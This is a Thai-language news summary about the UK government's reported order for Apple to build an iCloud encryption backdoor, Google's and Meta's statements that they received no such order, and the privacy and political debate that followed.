การที่ Google ไม่ถูกแตะต้อง ทำให้หลายฝ่ายตั้งคำถามว่า คำสั่งของ UK อาจไม่ได้ครอบคลุมทุกบริษัท หรืออาจมีการเลือกเป้าหมายอย่างเฉพาะเจาะจง

Apple ถูกสั่งให้สร้าง backdoor ในระบบเข้ารหัสของ iCloud
คำสั่งออกโดย UK Home Office ผ่าน Technical Capability Notice (TCN)
ส่งผลให้ Apple ยกเลิกฟีเจอร์ Advanced Data Protection (ADP) ใน UK

Google ยืนยันว่าไม่เคยได้รับคำสั่ง TCN จากรัฐบาล UK
Karl Ryan โฆษกของ Google ระบุว่า “เราไม่เคยสร้างช่องโหว่ใด ๆ”
“ถ้าเราบอกว่าระบบเข้ารหัสแบบ end-to-end ก็หมายความว่าไม่มีใครเข้าถึงได้ แม้แต่เราเอง”

ภายใต้กฎหมาย UK บริษัทที่ได้รับคำสั่ง TCN ห้ามเปิดเผยว่าตนได้รับคำสั่งนั้น
ทำให้เกิดความคลุมเครือว่าบริษัทใดถูกสั่งจริง
Meta เป็นอีกบริษัทที่ยืนยันว่าไม่เคยได้รับคำสั่ง TCN

Apple ยื่นอุทธรณ์คำสั่งต่อศาลพิเศษ และได้รับการสนับสนุนจาก WhatsApp
คดีนี้อาจกลายเป็นจุดเปลี่ยนสำคัญของการปกป้องความเป็นส่วนตัว
มีองค์กรกว่า 200 แห่งร่วมลงชื่อเรียกร้องให้รัฐบาล UK ยกเลิกคำสั่ง

รัฐบาลสหรัฐฯ กดดันให้ UK ยุติคำสั่ง TCN ต่อ Apple
รองประธานาธิบดี JD Vance และวุฒิสมาชิก Wyden แสดงความกังวล
อ้างว่าเป็นการละเมิดสนธิสัญญา Cloud Act ระหว่างสหรัฐฯ กับ UK

การสร้าง backdoor ในระบบเข้ารหัสอาจเปิดช่องให้เกิดการละเมิดความเป็นส่วนตัวทั่วโลก
ผู้ใช้ทั่วโลกอาจถูกเข้าถึงข้อมูลโดยไม่ได้รับอนุญาต
ช่องโหว่ที่สร้างโดยรัฐอาจถูกแฮกเกอร์ใช้ในอนาคต

กฎหมาย TCN ห้ามบริษัทเปิดเผยว่าตนได้รับคำสั่ง ทำให้ผู้ใช้ไม่รู้ว่าข้อมูลตนถูกเข้าถึงหรือไม่
ขาดความโปร่งใสในการคุ้มครองข้อมูล
ผู้ใช้ไม่สามารถตรวจสอบหรือป้องกันตัวเองได้

การยกเลิก ADP ใน UK ทำให้ผู้ใช้สูญเสียการปกป้องข้อมูลขั้นสูง
แม้จะใช้ VPN ก็ไม่สามารถทดแทนการเข้ารหัสแบบ end-to-end ได้
เสี่ยงต่อการถูกเข้าถึงข้อมูลโดยหน่วยงานรัฐหรือบุคคลที่สาม

การเลือกเป้าหมายเฉพาะเจาะจงอาจสะท้อนถึงการเมืองเบื้องหลังคำสั่ง TCN
Google อาจรอดเพราะเหตุผลทางการค้า การเมือง หรือการเจรจา
สร้างความไม่เท่าเทียมในการคุ้มครองผู้ใช้ระหว่างบริษัทต่าง ๆ

https://www.techspot.com/news/108870-google-never-received-uk-demand-encryption-backdoor-unlike.html